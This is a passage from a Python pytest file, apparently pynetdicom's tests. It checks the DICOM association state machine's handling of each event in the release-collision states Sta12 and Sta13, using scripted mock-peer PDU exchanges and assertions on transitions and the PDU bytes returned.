assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta12 + Evt2."""
# Sta12 + Evt2 -> <ignore> -> Sta12
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta12 + Evt3."""
# Sta12 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_ac), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt3', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta12 + Evt4."""
# Sta12 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_rj), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt4', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta12 + Evt5."""
# Sta12 + Evt5 -> <ignore> -> Sta12
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta12 + Evt6."""
# Sta12 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt6', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta12 + Evt7."""
# Sta12 + Evt7 -> <ignore> -> Sta12
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt7'
]
def test_evt08(self):
"""Test Sta12 + Evt8."""
# Sta12 + Evt8 -> <ignore> -> Sta12
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt8'
]
def test_evt09(self):
"""Test Sta12 + Evt9."""
# Sta12 + Evt9 -> <ignore> -> Sta12
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt9'
]
def test_evt10(self):
"""Test Sta12 + Evt10."""
# Sta12 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', p_data_tf), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt10', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta12 + Evt11."""
# Sta12 + Evt11 -> <ignore> -> Sta12
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt11'
]
def test_evt12(self):
"""Test Sta12 + Evt12."""
# Sta12 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_release_rq), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt12', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta12 + Evt13."""
        # Sta12 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_release_rp), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt13', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt13'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta12 + Evt14."""
        # Sta12 + Evt14 -> AR-4 -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Issue A-RELEASE-RP PDU and start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('recv', None), # recv a-release-rp
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt14', 'AR-4'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt14'
]
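        # AR-4 answers the collision with an A-RELEASE-RP PDU
        # (type 0x06, length 4), which is what the parrot received here.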
assert scp.handlers[0].received[2] == (
b'\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt15(self):
"""Test Sta12 + Evt15."""
# Sta12 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt15', 'AA-1'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta12 + Evt16."""
# Sta12 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_abort), # trigger event
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt16', 'AA-3'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt16'
]
def test_evt17(self):
"""Test Sta12 + Evt17."""
# Sta12 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt17', 'AA-4'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt17'
]
def test_evt18(self):
"""Test Sta12 + Evt18."""
# Sta12 + Evt18 -> <ignore> -> Sta12
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt18'
]
def test_evt19(self):
"""Test Sta12 + Evt19."""
# Sta12 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt19', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState13(TestStateBase):
"""Tests for State 13: Waiting for connection closed."""
def move_to_state(self, assoc, scp):
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
assoc.acse.send_request()
assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
if assoc.dul.socket and assoc.dul.socket.ready:
assoc.dul._read_pdu_data()
return True
return False
return orig_method()
assoc.dul._is_transport_event = patch_xport_event
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta13')
def test_evt01(self):
"""Test Sta13 + Evt1."""
# Sta13 + Evt1 -> <ignore> -> Sta13
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
self.assoc.dul.socket.close()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta13 + Evt2."""
# Sta13 + Evt2 -> <ignore> -> Sta13
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta13 + Evt3."""
# Sta13 + Evt3 -> AA-6 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_rq),
('send', a_associate_ac),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
self.assoc.dul.socket.close()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt3', 'AA-6'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt3']
def test_evt04(self):
"""Test Sta13 + Evt4."""
# Sta13 + Evt4 -> AA-6 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_rq),
('send', a_associate_rj),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt4', 'AA-6'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta13 + Evt5."""
# Sta13 + Evt5 -> <ignore> -> Sta13
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta13 + Evt6."""
# Sta13 + Evt6 -> AA-7 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
('recv', None),
('send', a_associate_rq),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt6', 'AA-7'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt6']
def test_evt07(self):
"""Test Sta13 + Evt7."""
# Sta13 + Evt7 -> <ignore> -> Sta13
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt7']
def test_evt08(self):
"""Test Sta13 + Evt8."""
# Sta13 + Evt8 -> <ignore> -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt8']
def test_evt09(self):
"""Test Sta13 + Evt9."""
# Sta13 + Evt9 -> <ignore> -> Sta13
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt9']
def test_evt10(self):
"""Test Sta13 + Evt10."""
# Sta13 + Evt10 -> AA-6 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_rq),
('send', p_data_tf),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt10', 'AA-6'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt10']
def test_evt11(self):
"""Test Sta13 + Evt11."""
# Sta13 + Evt11 -> <ignore> -> Sta13
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt11']
def test_evt12(self):
"""Test Sta13 + Evt12."""
# Sta13 + Evt12 -> AA-6 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_rq),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt12', 'AA-6'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt12']
def test_evt13(self):
"""Test Sta13 + Evt13."""
        # Sta13 + Evt13 -> AA-6 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_rq),
('send', a_release_rp),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
